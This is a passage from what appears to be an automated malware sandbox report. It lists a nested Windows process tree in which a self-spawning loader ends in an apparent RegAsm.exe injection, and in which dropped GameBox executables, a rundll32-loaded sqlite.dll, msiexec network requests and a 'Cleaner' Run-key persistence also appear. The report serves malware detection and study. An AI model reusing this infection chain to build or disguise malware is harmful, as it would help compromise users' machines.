                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                PID:8524
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                  PID:8840
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                    PID:9196
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                      PID:8636
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                        PID:680
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                                                            PID:8528
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                              PID:8640
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                PID:8412
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                  PID:8676
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                    PID:6732
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                      21⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                      PID:6856
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                        PID:8748
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                          23⤵
                                                                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                          PID:7644
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                            24⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                            PID:6352
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                              25⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                              PID:6184
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                26⤵
                                                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                PID:8568
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                  27⤵
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                  PID:7216
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                    28⤵
                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                    PID:4504
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                      29⤵
                                                                                                                                                                                                                                                                                                                                        PID:6892
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                          30⤵
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                          PID:6172
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                            31⤵
                                                                                                                                                                                                                                                                                                                                              PID:8532
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                32⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7200
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                    33⤵
                                                                                                                                                                                                                                                                                                                                                      PID:7408
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                        34⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4720
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                            35⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1352
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                36⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:7136
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                    37⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4996
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                        38⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:4068
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                            39⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:7912
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                40⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:7408
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                    41⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5576
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                        42⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                        PID:7024
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                          43⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:8232
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                              44⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:8816
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                  45⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:9080
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                      46⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:3320
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                          47⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:8672
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                              48⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6892
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                49⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2036
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                    50⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3320
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                        51⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1180
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                                            52⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3620
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              53⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10064
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                        ping RJMQBVDN -n 30
                                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                        PID:6096
                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                PID:5956
                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  PID:6076
                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                PID:5888
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7031073.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7031073.exe"
                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  PID:5784
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2738934.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\2738934.exe"
                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                  PID:5208
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1151040.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1151040.exe"
                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  PID:5168
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\7981856.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\7981856.exe"
                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  PID:5740
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                        PID:6392
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                          PID:6428
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                        PID:7360
                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 17E894E097EB154D9CBF0CE4F80F53F9 C
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          PID:7736
                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 0ADB9257874CF90E84B1FE46E5C0255D C
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          PID:6244
                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding C819C3C8A581DEC81624D65E6056895D
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          PID:3028
                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 5D17E1A801F29A7324267E592EFCD43F C
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          PID:8236
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                          PID:7000
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:3976
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                PID:6952
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x1d4,0x204,0x7ffcd0f9dec0,0x7ffcd0f9ded0,0x7ffcd0f9dee0
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:3744
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0x94,0x128,0x7ff750a79e70,0x7ff750a79e80,0x7ff750a79e90
                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                      PID:5324
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1528 /prefetch:2
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:9416
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --mojo-platform-channel-handle=1816 /prefetch:8
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:9432
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1512,17493402186688487256,10734524978746905717,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6952_1835004437" --mojo-platform-channel-handle=2124 /prefetch:8
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:9476
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
